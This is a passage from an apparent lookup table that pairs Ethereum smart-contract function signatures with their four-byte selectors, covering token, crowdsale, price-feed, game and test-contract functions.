"transferTo(address,address,uint256)": "0xa5f2a152", "NigerianNairaToken()": "0x3f44d89f", "_transferXToken(address,address,uint256)": "0x0ac799ff", "Version(string,address,address,address,address,address)": "0xf55f41f9", "setupFund(bytes32,address,uint256,uint256,address,address,address[],address[],uint8,bytes32,bytes32)": "0xe6b96fe3", "getHistoryAt(uint256)": "0xd08f2c67", "getHistoryLength()": "0x5478f468", "getPriceFeedsByOwner(address)": "0x9256c71d", "getOrderPriceInfo(address,address,uint256,uint256)": "0x977d6276", "getReferencePriceInfo(address,address)": "0xa159c937", "getInvertedPriceInfo(address)": "0x93da4cfd", "getPriceInfo(address)": "0x8edbf436", "disableUpdates()": "0x3393385f", "enableUpdates()": "0x80836cab", "setMinimumPriceCount(uint256)": "0x4326f3f6", "medianize(uint256[])": "0xbeb1274d", "pricesToCommit(address[])": "0xf2ac9427", "collectAndUpdate(address[])": "0xc28e5022", "burnStake(address)": "0xf39981e1", "setupStakingPriceFeed()": "0x8c7e1227", "removeStakerFromArray(address)": "0x96574919", "updateStakerRanking(address)": "0xf8085c58", "removeNode(uint256)": "0xffd740df", "insertNodeBefore(uint256,uint256,address)": "0x68445ce1", "insertNodeAfter(uint256,uint256,address)": "0x9daf9b6b", "insertNodeSorted(uint256,address)": "0x249f1f22", "totalStakedFor(address)": "0x4b341aed", "getStakersAndAmounts()": "0x845a7468", "isOperator(address)": "0x6d70f7ae", "searchNode(address)": "0x9ca75320", "isValidNode(uint256)": "0x2ac85e46", "stake(uint256,bytes)": "0x0e89439b", "unstake(uint256,bytes)": "0xc8fd6ed0", "depositStake(uint256,bytes)": "0xd660521c", "StakingPriceFeed(address,address,address)": "0xc865164b", "_updatePrices(address[],uint256[])": "0x9788d5ff", "SimplePriceFeed(address,address,address)": "0xebf0e5f1", "exchangeMethodIsAllowed(address,bytes4)": "0x03656d07", "getExchangeFunctionSignatures(address)": "0x6edc7ba7", "getExchangeInformation(address)": "0xfe68b528", "getRegisteredExchanges()": "0xa6fe178c", "exchangeIsRegistered(address)": "0xfe4e4a84", "assetMethodIsAllowed(address,bytes4)": "0x68171516", "getRegisteredAssets()": "0xcf5cb132", "assetIsRegistered(address)": "0x1f8d99a9", "removeExchange(address,uint256)": "0xb617cf42", "removeAsset(address,uint256)": "0x2317ef67", "updateExchange(address,address,bool,bytes4[])": "0x985e2cdf", "updateAsset(address,bytes32,bytes8,uint256,string,string,address[2],uint256[],bytes4[])": "0x17a40e92", "registerExchange(address,address,bool,bytes4[])": "0x89e6579b", "registerAsset(address,bytes32,bytes8,uint256,string,string,address[2],uint256[],bytes4[])": "0x6126cb99", "changeCompetitionAddress(address)": "0xa7c99f2c", "isCompetitionAllowed(address)": "0x77226237", "CompetitionCompliance(address)": "0x644b1d1a", "getOpenOrderInfo(address,address)": "0x2e62efbb", "orderExpired(address,address)": "0x8a56fe46", "getExchangeInfo()": "0x8bc5b3c5", "getOwnedAssetsLength()": "0xfddc4686", "getLastOrderIndex()": "0x5e2fe372", "addAssetToOwnedAssets(address)": "0x07afbe74", "removeOpenMakeOrder(address,address)": "0xfcfdcf8a", "addOpenMakeOrder(address,address,uint256)": "0x770864ad", "callOnExchange(uint256,bytes4,address[5],uint256[8],bytes32,uint8,bytes32,bytes32)": "0x82c7bac7", "Fund(address,bytes32,address,uint256,uint256,address,address,address,address[],address[])": "0x218ffb4c", "withdrawMln(address,uint256)": "0x32bafb2c", "batchAddToWhitelist(uint256,address[])": "0x271cacbf", "registerForCompetition(address,uint8,bytes32,bytes32)": "0xef961367", "calculatePayout(uint256)": "0x3bb91c77", "getEtherValue(uint256)": "0xf45a729c", "getTimeTillEnd()": "0x2b9122df", "getCompetitionStatusOfRegistrants()": "0xc58d0be0", "getRegistrantFund(address)": "0x1aadadaa", "getRegistrantId(address)": "0x0d20a889", "getMelonAsset()": "0x3eedabcf", "isCompetitionActive()": "0x444c3d9a", "termsAndConditionsAreSigned(address,uint8,bytes32,bytes32)": "0xef36a883", "Shares(bytes32,bytes8,uint256,uint256)": "0x677a7735", "disableInvestment(address[])": "0xec622892", "enableInvestment(address[])": "0x212f6066", "requestInvestment(uint256,uint256,address)": "0x5d582870", "newGroup(address[],uint256,uint256)": "0x36f78d77", "expired(uint256)": "0xba065e1f", "confirmed(uint256)": "0xf3ac2732", "triggered(uint256)": "0xdfffcbdb", "deadline(uint256)": "0xc40dc8ec", "confirmations(uint256)": "0xb9774f7b", "calldata(uint256)": "0x7e2bef39", "target(uint256)": "0x9811c7c1", "memberCount()": "0x11aee380", "DSGroup(address[],uint256,uint256)": "0x5b329058", "NERU()": "0xb7cb4830", "NewsCash()": "0x2072cde2", "RequestSale()": "0xdd1dc0ad", "GChain(uint256,string,uint8,string)": "0xa11bab06", "PCFF()": "0x56c5df29", "HoQuBurner(address)": "0x97246156", "Geniota(uint256,string,uint8,string)": "0x6d2ff3d3", "UVIDIFYTOKEN()": "0x8443f07c", "RYNO()": "0xc583bb53", "FundAccount(address,address,address)": "0xbaf44453", "EverhuskCrowdsale(uint256,uint256,uint256,address)": "0xb781afa7", "FILO()": "0x406c5590", "setifoodCommunityAddress(address)": "0xfe8d640c", "setifoodDevAddress(address)": "0x2aa4c051", "withdrawLocked()": "0xd135cc4b", "EladToken()": "0x7467af07", "UCToken()": "0x9bb5f901", "BITSEACoinERC20Token(uint256,string,string,uint256)": "0x579140e8", "GoCryptobotCore()": "0xbca76131", "run(bytes,uint8[4],uint8[2][4])": "0x91441589", "_getPlayerThemeEffect(bytes,uint256)": "0x8b20d082", "_getPartSkillLevel(bytes,uint256,uint256)": "0x83f0bb45", "_getPartSkillColor(bytes,uint256,uint256)": "0x64308a6a", "_getPartLevel(bytes,uint256)": "0x54e2cf2d", "_random256()": "0x88f9ff98", "_shuffle(uint8[])": "0xa61e1fc1", "_initRandom()": "0x5725b8c5", "commitment()": "0x1303a484", "AstatosToken(address)": "0xca790380", "COSMOTokenERC20(uint256,string,string)": "0x9ad25a68", "transferFunds(address,address,uint256)": "0x1501bf03", "disablePresale(bool)": "0x052a076f", "Flames()": "0x89b3f8c7", "MAGICCOINERC20(uint256,string,string)": "0xae1e2096", "tokenesia()": "0x3551c8b9", "CERB_Coin()": "0x8a13796e", "GoGO()": "0xc00c176c", "calculateTally(address,uint256)": "0xfec07cb2", "_sendEthereum(uint256)": "0x1dd9a3cf", "_withdrawEthereum(uint256)": "0x932e2e95", "_transferEthereum(uint256,uint256,uint256)": "0xdefaa5f2", "_depositTransferCredits(uint256,uint256)": "0x14b79e21", "_depositEthereum(uint256)": "0xbf34040d", "_addEthereumAddress(uint256,address)": "0xb006b86e", "setTwitterBot(address)": "0xe2420bd2", "setTransferCreditBot(address)": "0x38ea1c4d", "SFCapitalToken(string,string,uint8,uint256)": "0x549bf9b9", "soccer()": "0xec3575ec", "ADV(uint256,string,string)": "0x8ec8fcad", "TripPay(uint256,string,string)": "0x7e79a562", "TOBToken()": "0xc7576e8f", "Medcash(address,address)": "0xca7c8d07", "Fetish()": "0xf784cae5", "GlobalPersonalInsuranceChain()": "0xa626f445", "Deposit(uint8)": "0xd45baeab", "EthTermDeposits()": "0x43a47ae2", "createCustomToken(string,string,uint8)": "0xa1787880", "NokuCustomERC20Service(address)": "0xf4619e71", "CEL(uint256,string,uint8,string)": "0xa572ba41", "ExpandT()": "0xcc47de73", "WWNCoin()": "0x1116cba9", "getTimestamp(address)": "0x8bf57f4e", "getLRCAmount(address)": "0x22ddde5b", "issueTokenAndApprove(uint256,address)": "0x21667940", "issueToken(uint256)": "0xcc3df01f", "putIntoPackage(uint256,uint256,address)": "0xe471a5b9", "getAllPackage()": "0x6eb86537", "LuckyPackage()": "0x93f1b685", "iWAMToken()": "0x9f1f07fe", "takeFee(uint256)": "0x5f7619a4", "newFee(uint256)": "0xba1ad438", "getRateLimit()": "0xe8c67216", "setAccountUrl(string)": "0xcf876b72", "RedTicket(uint256,address)": "0xa2d0b147", "ZDMCoin()": "0x159c60e8", "EliteCoin()": "0x94c90cac", "setcommissionPer(uint8)": "0x75ca1fad", "Computer()": "0x474ce368", "AltToken(address)": "0x4cff6ae5", "takeAway(address,address)": "0xcf6fbeea", "DefaultToken(string,string,uint256,address)": "0x47f280aa", "unfrezee()": "0xd8507a8d", "TokenPolicy(address)": "0xf2fa8f69", "Testico()": "0xd074de8c", "selfWithdrawBalance()": "0xf95af865", "incomeAllocation()": "0x12592381", "deleteMember(address,address)": "0x3d062adf", "updateMember(address,address,uint256)": "0xbed09038", "addMember(address,address,uint256)": "0xdef59ea5", "getMember(address,address)": "0x0a55fbfe", "getTotalShares()": "0xd5002f2e", "airdropTokens(address[])": "0x4ee51a27", "cancelBounty(uint256)": "0xe5e5dff1", "rewardUser(uint256,address,uint256)": "0x46db63d7", "rewardUsers(uint256,address[],uint256[])": "0xf33b1ea5", "setBountyBeneficiariesCount(uint256)": "0x387d49d4", "setMinBounty(uint256)": "0x3b58f49a", "setBountyDuration(uint256)": "0x19de029a", "withdrawFee(uint256)": "0xbe357616", "BountyBG()": "0x318cbe20", "geth(uint256)": "0xa5c8a201", "addre(address)": "0x34b63592", "_delOwner(address)": "0x30323542", "_addOwner(address)": "0x511bc0f6", "insertAndCheckDo(bytes32)": "0x8062d3e6", "validDoHash(bytes32)": "0xe0402d26", "calcDoHash(string,bytes32)": "0x8003524e", "ownersForChange()": "0xcb8a67ed", "cancelDo(bytes32)": "0x8eeb5c97", "dropOwner(address)": "0x49cacb12", "insertOwner(address)": "0x343bd7eb", "multiOwner(address[])": "0x465f41b1", "reclaimElement()": "0x1e41583b", "HasNoElement()": "0x47cbc4f1", "_execute()": "0x420aadb8", "blocktubeClip(string,uint256,uint256)": "0xa5ebc10b", "Ticketh()": "0xdc91b634", "setRunningInternal(bool)": "0xf38db3d8", "Stoppable()": "0x999f5644", "balanceHistory(address,uint256)": "0xdd2c888e", "balanceHistoryLength(address)": "0xd5d4dfad", "totalSupplyHistoryLength()": "0xb66dbdc5", "deal()": "0x553df021", "Dealer()": "0x173a0615", "test0_adding()": "0xc9b46bbb", "beforeAll()": "0x7fea0d4b", "g()": "0xe2179b8e", "GasReceipt(address)": "0xbf98a50d", "getReceipt(address,uint256)": "0xbae18880", "createReceipt(address,string)": "0x4e49954e", "removeSupervisor(address)": "0x7128defb", "supervisorVote(uint256,bool)": "0x1f4f9ab1", "resolveSupervisorVote(uint256)": "0xba42c8e5", "addSupervisor(address)": "0x29d10b6e", "getPaperFromMeta(uint256,uint256)": "0x915009a7", "getPaper(uint256)": "0x07993f04", "copyPaper(address,uint256)": "0xc6814aa2", "getLastPaperFromContract(address,address)": "0xb2170394", "createPaper(string,bytes32,uint256,uint256[],address,address[])": "0x980f8e5e", "testMeta(uint256)": "0x67e874c0", "getMeta(uint256)": "0x36dac2cc", "editMeta(string,uint256)": "0x3ec414c8", "makeMetaPublic(uint256,bool)": "0x36ea8702", "addUserToMeta(address,uint256)": "0xf300cf1d", "assignMeta(string,uint256)": "0xebeb76bb", "getDatabase(uint256)": "0xf6afad47", "setDatabase(string,uint256)": "0x9db3956e", "getLawyer(address)": "0x698edc76", "assignLawyer(string)": "0xd89cca38", "StonePaper()": "0x943153cf", "getSociety(uint256)": "0xbe5eeb2d", "createNewSociety(string)": "0xf3de56de", "Society(string,address)": "0x3045a299", "deVerify(address)": "0xc2e78f12", "makeSuperVisor(address)": "0x70359b36", "isVerified(address)": "0xb9209e33", "isSigned()": "0xe66a6b22", "checkHash(bytes32)": "0xd604d8d1", "signTwo()": "0xf8c64800", "signOne()": "0x2bcef221", "TwoPersonContract(address,address,bytes32)": "0xdca0b866", "setProposalDeposit(uint256)": "0x6d9b06e8", "withdrawEth()": "0xa0ef91df", "withdrawChildDao()": "0x091eea8f", "withdrawDao()": "0x2abd7fc8", "executeChildDaoProposal()": "0x35105e3b", "prepareWithdrawProposalGivenSplitProposalId()": "0xc99749a8", "executeParentDaoSplit()": "0x7da16762", "startSplit()": "0x8f1fc530", "AutoSplitCurator(address)": "0xf47aa124", "throws()": "0xb71e9c23", "changeLibAddress(address)": "0x1e1d696a", "newCreator()": "0x8f855433", "RegisterIP(bytes32,string)": "0xdf76d18d", "returnedDataDecoded()": "0x64425055", "getExecutorRegistry()": "0x6dbb7bcd", "getExecutor(bytes)": "0xf92a79ff", "runScript(bytes,bytes,address[])": "0x6f09240f", "mint(int256,uint256,address)": "0xeb9e0398", "sendToken(uint256,address)": "0x72378554", "setOwner()": "0x40caae06", "getMinter()": "0xf3667517", "setMinter(address)": "0xfca3b5aa", "GoldTokenLedger()": "0xec77a89f", "selfRegister(bytes32)": "0xb222cb0b", "participantCanParticipate(address)": "0x4e16e0c7", "registerParticipant(address)": "0x7cc9e4f0", "registerCertificate(address)": "0x77bdbccc", "isCertificateRegisteredAndValid(address)": "0xaf191aa5", "KPCS(address)": "0x763add8f", "Set(bytes32,bytes32)": "0xbe36e676", "getSigner()": "0x7ac3c02f", "getReceiver()": "0x98aca922", "Deal()": "0x5778bec2", "performPhase()": "0x453cddaf", "performUpdateMemsize()": "0x8addf3ca", "performUpdateCallPtr()": "0xac6d0316", "performUpdateStackPtr()": "0xa5705d17", "performUpdatePC()": "0x253f029c", "performWrite2()": "0x094c2919", "performWrite1()": "0xba17e592", "performALU()": "0x367f34de", "isBuyer(address)": "0x2a55feec", "transferAdminOwnership(address)": "0x08a80ff5", "NPTToken(address)": "0x7685e1df", "betPlaced(address,uint256,uint256)": "0x4b9c4358", "betPlaced(address,address,uint256,uint256)": "0x330278e0", "newCampaign(uint32,uint256)": "0xfb850fab", "calcGain()": "0x5262c873", "weiReceive()": "0x0e2f0a0f", "Crowdsale7(address,uint256,uint256,uint256,address,address)": "0xc2f02b33", "FundsKeeper(address)": "0x0dd327fe", "withDrawEther(uint256)": "0xcaad5b18", "showPoolContract(uint256)": "0x508ab47a", "sendTeamTokens(address,uint256)": "0x1196deda", "showPoolOwner(uint256)": "0x240961db", "unPreIco()": "0x17ae5d88", "showPoolNumber(address,address)": "0xae0250c1", "setPreIco()": "0x736fafd3", "receiveTokenFromContract(uint256)": "0x780aa037", "QvoltaToken(address)": "0x627a3311", "createPool(address,uint256,uint256,uint256,uint256,uint256,uint256)": "0x2406e626", "issueToken(address,uint256)": "0xe74a84ea", "MyOwnCoin()": "0xc6ad1191", "PSIToken()": "0x6d18c778", "GBToken()": "0xa28a1564", "sayOwnerHello(string)": "0x787ed1f8", "ExTokeB()": "0x5b11380d", "BCTopCraftCannabis()": "0x178003e1", "transferEth()": "0x59852686", "CryptoSneakersCoin()": "0x5355ee2f", "transferSaleWallet(address)": "0x90f4c33a", "_buyToken(address,uint256)": "0x988bfcfa", "isTokenTransferLocked()": "0x5c50c63a", "assertCorrectAllocations()": "0x3d36f7dd", "addInvestment(bytes32)": "0x8dd3c196", "getInvestment(uint256)": "0x22ae634f", "getNumInvestments()": "0x46ec56c5", "setAllocations(bytes32)": "0x08d33e4c", "getAllocation(uint256)": "0x5a5804b3", "Portfolio(address)": "0xde854065", "unpackInvestment(bytes32)": "0x39a73978", "unpackAllocation(bytes32)": "0xfe8e992f", "GelatoCoin()": "0x1ac39336", "chrissycoinToken()": "0x7b7a720a", "RWSC()": "0x65a61ab4", "HolahopToken()": "0x1f1ea554", "ThailandVsMyanmar()": "0x81bf1cff", "update_current_rate(uint256,string)": "0xf9039f33", "withdraw_unclaimed_balance(uint256)": "0xad9f9a68", "check_dividend(address)": "0x1aaf39ff", "calculate_dividend(uint256,uint256)": "0x2bfd2a13", "calculate_eligible_token_balance(address,uint256)": "0x30b69426", "claim_devidend_for(uint256)": "0xb0898886", "claim_devidend()": "0x1e0efae1", "pay_dividend(string)": "0x680f0938", "update_dividend(address,uint256,uint256,uint256)": "0x15036fa2", "handle_dividend(address,address)": "0xb5aae91a", "Happy()": "0x9d4d8db3", "getTest()": "0xa8cd0a80", "setTest(uint256)": "0x6ca1f933", "setSaleAddr(address)": "0xc3c5b40e", "ERC20Token(uint256,address)": "0x9c84eebe", "LEYBAERT()": "0x3a903dfa", "fuint256a(uint256[])": "0x0a1f868c", "fstring(string)": "0x66b46149", "fbytes32(bytes32)": "0xaa692151", "fbytes2(bytes2)": "0xb2d14545", "faddress(address)": "0x5ca91d7f", "fint256(int256)": "0xacb894d2", "fint32(int32)": "0x9883548a", "fint8(int8)": "0xf3c537c5", "fuint256(uint256)": "0x790dd0f5", "fuint32(uint32)": "0x63340338", "fuint8(uint8)": "0xc096aa81", "withDrawEther()": "0x9c0c2238", "showDepositEther(address)": "0xc426b1e5", "showInvestEther(address,uint256)": "0x069d92e3", "showPoolMembers(uint256)": "0x0dbb78ce", "multipleTokenDistribute(uint256)": "0x590d5a67", "withDrawToPoolOwnerFee(uint256)": "0xa12d2de3", "withDrawToPoolOwner(uint256)": "0xf6446614", "joinToPool(uint256,uint256)": "0x4a21f8f7", "createPool(string,address,uint256,uint256,uint256,uint256,uint256,uint256)": "0xf694b761", "_updatePlayersMilk(address)": "0xca3228d7", "_balanceOfUnclaimedMilk(address)": "0x92b87751", "_handleProductionDecrease(address,uint256)": "0x3e95f06d", "_handleProductionIncrease(address,uint256)": "0xfeb03fe1", "_createPotato(uint256,uint256,uint256,uint256,address)": "0x5072a21b", "computeMilkSellPrice()": "0x522a6cf3", "balanceOfTotalUnclaimedMilk()": "0x07c3d98b", "milkBalanceOf(address)": "0x4f1c8d0f", "milkTotalSupply()": "0x3eea5150", "getPotato(uint256)": "0x026a9cdd", "getOwnerPotatoes(address)": "0x5848a7fa", "potatoBalanceOf(address)": "0x8ca6f747", "potatoTotalSupply()": "0x5aae456a", "createPotato(uint256,uint256,uint256,uint256,address)": "0xb0b99c7d", "sellAllMilk()": "0xad7c66d0", "purchasePotato(uint256)": "0x9712a57e", "LinkToken(uint256,string,string,address)": "0x54dcfb9b", "updateDocumentPoll(bytes32)": "0x172a735c", "participantsFirst(uint256)": "0xe2a034dd", "getLevelUpCost(address,address)": "0xaeb447ff", "updateCard(uint256)": "0x9595898a", "beingVIP()": "0x2d3fcc23", "withdrawGift()": "0xb0ebb261", "sendGift(address,uint256)": "0x63d9b4b1", "buyCards(uint8)": "0x8e7e060f", "buyCardsAndSendGift(uint8,address)": "0xd0e46235", "getMarketPrice(uint8)": "0x56b0443f", "_calculateDiscount(uint8,address)": "0x0f473d72", "Etherchicks()": "0x1fe74895", "_computeCurrentPrice(uint256,uint256,uint256,uint32)": "0x9851663f", "buyout(uint256)": "0x07bec66f", "createAuction(uint256,uint128,uint128)": "0x4f494cad", "_isAuctionAble(uint256)": "0x437dbf49", "_getCards(uint8,address)": "0x06437e4f", "_beingVIP(address)": "0x17cacc1e", "_updateCard(address,uint256)": "0xdb856f28", "_generateCode(address,uint256)": "0x7ec2e264", "getAllParticipants()": "0x195ec9ee", "removeParticipant(uint8)": "0x3fa68836", "setACmarge(uint8)": "0x95263183", "percentage(uint256,uint8)": "0xde26bbb2", "setPatch(uint256,uint8,uint8)": "0x59032232", "setUser(address,address,bool)": "0xf37fda1b", "giftFor(address,address,uint256)": "0x9a7efb7f", "RoyalPanties(uint256,string,string)": "0xf932380e", "setFrozen(address,bool,uint256)": "0x8280b498", "createERC20(uint256,string,uint8,string)": "0xb6791322", "verifyERC20(address)": "0x2d49f5fc", "MeritToken(uint256)": "0x75864416", "WAVcoin()": "0x60fd0668", "_initializeGame()": "0x070f723d", "_mintCategory(string)": "0x6af81d6f", "_nextPrice(uint256)": "0x367afa7a", "withdrawDevBalance()": "0xfb5bd32b", "sendPrize(address,uint256,string)": "0x1b130063", "setRequiredBlockQueueTime(uint256)": "0x21537caf", "setCelebrityPrice(uint256,uint256)": "0xd2f27cf4", "releaseCelebrity(uint256)": "0x7a81f972", "getFameBalance(address)": "0xb2ccc4ab", "getCelebrity(uint256)": "0x2bcbe1b5", "createCelebrity(string,address,address,uint256,uint256,bool,uint256[])": "0x3af1e17e", "createCategory(string)": "0xdc298682", "buyCelebrity(uint256)": "0x244bfa6b", "becomeAgent(uint256,uint256)": "0x1db5ca3b", "acquireFame(uint256)": "0xd017cdcf", "CelebsParty()": "0x62754563", "CelebsPartyGate()": "0x4ef98616", "Aecium()": "0x72b4e98f", "TCSCCoin()": "0xf1ea43e7", "_createTot(string,address,uint256)": "0x138efd00", "getTot(uint256)": "0x66c2d620", "createContractTot(string,uint256)": "0xc8199231", "EtherTots()": "0xc94c79dd", "SelfPayPreSale(uint256,uint256,uint256,uint256,uint256,address,address)": "0xef5c2010", "BitBaBeToken()": "0x949c89a0", "freeTokens(address)": "0x0b63b114", "CrowdsaleGummy(address,address)": "0xd6bb0ad5", "MANHATTANPROXY6THST()": "0x4f0913ef", "NaNoDigitalToken()": "0x47d38af4", "TPTToken(uint256)": "0x85561120", "getBaseQuick(bytes32)": "0x81252680", "AHS(uint256,bytes32,bytes32)": "0x4d34dce1", "doesOwnBase(bytes32,address)": "0x3acbd9eb", "findAddress(bytes32,bytes32)": "0x378bc89d", "transferBase(bytes32,address)": "0xe22325ad", "registerHandle(bytes32,bytes32,address)": "0x441230e4", "registerBase(bytes32)": "0x265a3afd", "withdrawBonus()": "0x66de84ec", "bonusAmount(uint256,address)": "0x7c535f1f", "myBonus()": "0x91d4357b", "setWonTeam(uint256)": "0x6c3051c9", "stopVote()": "0x2495c0ce", "userVoteFor(address,uint256,uint256)": "0x1cabc5ed", "getVoteOf(uint256)": "0x02d77954", "setPoolCut(uint256)": "0xf72e695b", "setVoteCut(uint256)": "0xe5b7ec88", "setMinVote(uint256)": "0x65ce7395", "setVoteWeight(uint256)": "0x189ca316", "withdrawPart(address,uint256)": "0x2f475c32", "In(address)": "0xd64f5135", "Out(uint256)": "0x5ac5c4f7", "FundTransfer(uint256,bytes32,address,address)": "0x8cad5826", "finishPreSale5()": "0x98e23dcf", "balancePreSale5()": "0x3d19481f", "preSale5()": "0x71be0c27", "callThisToStop()": "0x4192610e", "callThisToStart()": "0xea2a9599", "tmp()": "0xb518a776", "SpiderFarm()": "0x11c19d3c", "updateEggs()": "0x60f01452", "devFee2(uint256)": "0xea3f190e", "RAIOCO(uint256,string,string)": "0x01bb4edf", "Charity()": "0x258c2a2d", "sendETHtoBoard(uint256)": "0x786e06f3", "startRedeem(uint256,bool)": "0x5ef7ac4d", "startMint(uint256,bool,int256,uint256)": "0xecc5aaaa", "setTeamAdd(address)": "0x9c39857b", "setBoardAdd(address)": "0x54734f7d", "getChannelPostCount(address)": "0xae9a0785", "getAccount(address)": "0xfbcbc0f1", "getChannel(address)": "0x9a01b4d5", "getContent(bytes32)": "0x5cc15001", "enableApi(address)": "0xbd322b77", "disableApi(address)": "0x68e7bdba", "setupDeposits()": "0x816e24b0", "tip(bytes32,address,uint256)": "0x7f602231", "reply(address,address,bytes32,bytes32)": "0x534878fb", "post(address,address,bytes32)": "0x2625e2e1", "getContents(bytes32[])": "0x7ff0346b", "_getContent(bytes32)": "0x64eb7327", "Batch(address)": "0x7115c988", "toContentID(address,string,string,address,bytes32)": "0x50692d9a", "publish(string,string,address,bytes32)": "0x3f2885cb", "deactivateTeam()": "0x4ff6aa46", "tryExecuteProposal(uint256,bytes)": "0x03ef2a2c", "approveRequest(uint256,bool,string)": "0x17fb6c6e", "createRequest(address,uint256,string,bytes,bytes)": "0x03048a42", "changeSettings(uint256,address,uint256)": "0x30b0faab", "changeMember(address,bool,bool,uint256)": "0x8a78f5e2", "Team(uint256,address,uint256)": "0x1820b575", "currency()": "0xe5a6b10f", "lastUpdate()": "0xc0463711", "decimalUnits()": "0x1caba41f", "Purge()": "0xf24e4a15", "totalBurned()": "0xd89135cd", "Burn()": "0x396ed0ab", "testFailCreateSameNonce()": "0x94106200", "testControlCreateSameNonce()": "0x6013aa44", "create(bytes1,bytes32,bytes32)": "0x81accd0b", "testControlBlobStoreNotRegistered()": "0x895224db", "testControlRegisterContractAgain()": "0x0ab03e1b", "testControlSetNotTransferableNotOwner()": "0x9bf68006", "testControlSetNotRetractableNotOwner()": "0xc3689f01", "testControlSetEnforceRevisionsNotOwner()": "0x0ec3b247", "testControlSetNotUpdatableNotOwner()": "0x50a9eddb", "testControlDisownNotTransferable()": "0x98a29a58", "testControlDisownNotOwner()": "0xb47784d9", "testControlTransferDisabled()": "0x32bf775d", "testControlTransferNotEnabled()": "0xe71d7bf0", "testControlTransferNotTransferable()": "0xe18c52ae", "testControlTransferDisableNotEnabled()": "0x20d615c2", "testControlTransferEnableNotTransferable()": "0x490825a9", "testControlRetractNotRetractable()": "0xcefdfcf3", "testControlRetractNotOwner()": "0xe37e60d1", "testControlRestartEnforceRevisions()": "0xcebb8bb0", "testControlRestartNotUpdatable()": "0x2d985cfb", "testControlRestartNotOwner()": "0xebc697d1", "testControlRetractLatestRevisionDoesntHaveAdditionalRevisions()": "0x610285d2", "testControlRetractLatestRevisionEnforceRevisions()": "0x6c712471", "testControlRetractLatestRevisionNotUpdatable()": "0xc7a3778f", "testControlRetractLatestRevisionNotOwner()": "0x86602b6b", "testControlUpdateLatestRevisionEnforceRevisions()": "0x80e74b04", "testControlUpdateLatestRevisionNotUpdatable()": "0x69c5c229", "testControlUpdateLatestRevisionNotOwner()": "0x8cdcdae1", "testControlCreateNewRevisionNotUpdatable()": "0xe73b7d77", "testControlCreateNewRevisionNotOwner()": "0x6e1479c0", "testControlCreateSameIpfsHashAndNonce()": "0xb7c38d02", "getAllRevisionIpfsHashes(bytes20)": "0x540c97c8", "getRevisionIpfsHash(bytes20,uint256)": "0x64d12ec6", "_getAllRevisionIpfsHashes(bytes20)": "0x147a5640", "create(bytes1,bytes32,uint256)": "0x01e3d346", "getBlobStoreFromFullBlobId(bytes32)": "0xf38e5ca2", "testFailSetNotTransferableNotOwner()": "0x5cc501ce", "testFailSetNotRetractableNotOwner()": "0xf2c2dff2", "testFailSetEnforceRevisionsNotOwner()": "0x6fe5b536", "testFailSetNotUpdatableNotOwner()": "0x32d8eee5", "testFailDisownNotTransferable()": "0xeddce76b", "testFailDisownNotOwner()": "0x776df027", "testFailTransferDisabled()": "0x19ea61db", "testFailTransferNotEnabled()": "0x615f9f1f", "testFailTransferNotTransferable()": "0xe2b8766c", "testFailTransferDisableNotEnabled()": "0x9acade7e", "testFailTransferEnableNotTransferable()": "0x71e60fe6", "testFailRetractNotRetractable()": "0xa9888148", "testFailRetractNotOwner()": "0x3cc0fb45", "testFailRestartEnforceRevisions()": "0xcf984f16", "testFailRestartNotUpdatable()": "0xd2c5c368", "testFailRestartNotOwner()": "0x617f8666", "testFailRetractLatestRevisionDoesntHaveAdditionalRevisions()": "0xc204505a", "testFailRetractLatestRevisionEnforceRevisions()": "0xc57a99e5", "testFailRetractLatestRevisionNotUpdatable()": "0xb2ab530e", "testFailRetractLatestRevisionNotOwner()": "0x251fa3b1", "testFailUpdateLatestRevisionEnforceRevisions()": "0xf99ebb71", "testFailUpdateLatestRevisionNotUpdatable()": "0x3ce1f4e7", "testFailUpdateLatestRevisionNotOwner()": "0x960d8cd3", "testFailCreateNewRevisionNotUpdatable()": "0x9a93e940", "testFailCreateNewRevisionNotOwner()": "0xded04fe9", "testFailCreateSameIpfsHashAndNonce()": "0xc28bfe5a", "testGetBlobStoreFromFullBlobId()": "0x7604b6d7", "testGetBlobStore()": "0x6ec99dd0", "testFailBlobStoreNotRegistered()": "0xcb56d626", "testFailRegisterContractAgain()": "0x22fa85ca", "restart(bytes20,bytes32)": "0xa4b8c2e7", "updateLatestRevision(bytes20,bytes32)": "0x7b760537", "createNewRevision(bytes20,bytes32)": "0x3a1a635e", "fundingStartBlock()": "0xd648a647", "tokenCreationMin()": "0xc039daf6", "ethFundDeposit()": "0xa81c3bdf", "ObitanChainToken()": "0x4a5e70c0", "sendVNET(address,uint256)": "0xc30b182e", "CNToken()": "0x3e9b4c24", "recycleSkin(uint256[5],uint256)": "0xb3b51aa3", "summon10()": "0xe70990d7", "moveData(uint128[],address[],bool[],uint256[])": "0xf0c87852", "donateSkin(uint128,address)": "0x148222cf", "switchBleachAllowed(bool)": "0x73acbcb2", "summon10SkinAppearance(uint256)": "0xe1ce95c8", "recycleAppearance(uint128[5],uint256)": "0x7ad06be3", "setProxy(address,bytes32)": "0x638a9ce9", "removeAssetPartOwner(bytes32,address)": "0xec77809f", "addAssetPartOwner(bytes32,address)": "0x048ae1bb", "removePartOwner(address)": "0x1286e393", "addPartOwner(address)": "0xa831751d", "SudjuKoin()": "0xbfb4d66f", "Poppins()": "0x9d4cc8ad", "socERC20(uint256,string,string)": "0x8eb3e0e3", "VenaCoin()": "0xc4d8aa44", "TokenSampleG()": "0x3018579e", "SendLCRTokens(address,address,uint256)": "0xa36db282", "subBountySupply(uint256)": "0x3e1ba676", "addTokenSupply(uint256)": "0xf18d4dbb", "availableBountyCount()": "0x89ada759", "TokensForSale()": "0x8f5bc587", "LICERIOToken()": "0x50013a53", "Insurence()": "0x345a3899", "tranferFrom(address,address,uint256)": "0x9264a169", "decreaseAssuranvePayments(address,uint256)": "0x3bc983d3", "increaseAssuranvePayments(address,uint256)": "0x1badbd5c", "safeMathAdd(uint256,uint256)": "0xa3d94402", "safeMathSub(uint256,uint256)": "0x326a794d", "safeMathDiv(uint256,uint256)": "0x78a70de5", "safeMathMul(uint256,uint256)": "0x84c6774c", "transferToAddress(address,uint256)": "0xacef6037", "proxyEnableRefunds()": "0xbeabb2c2", "proxyIncreaseWithdrawalChunk()": "0x8e72ca91", "getDaysPassedSinceLastTeamFundsBallot()": "0x63d5243a", "getDaysPassedSinceLastRefundBallot()": "0xca5a3f38", "startRefundInvestorsBallot()": "0x8fa65488", "startincreaseWithdrawalTeam()": "0xe65500e9", "VotingProxy(address,address)": "0x31c3e2c9", "percentLeftFromTotalRaised()": "0x83c10844", "refundInvestor(uint256)": "0x8df10469", 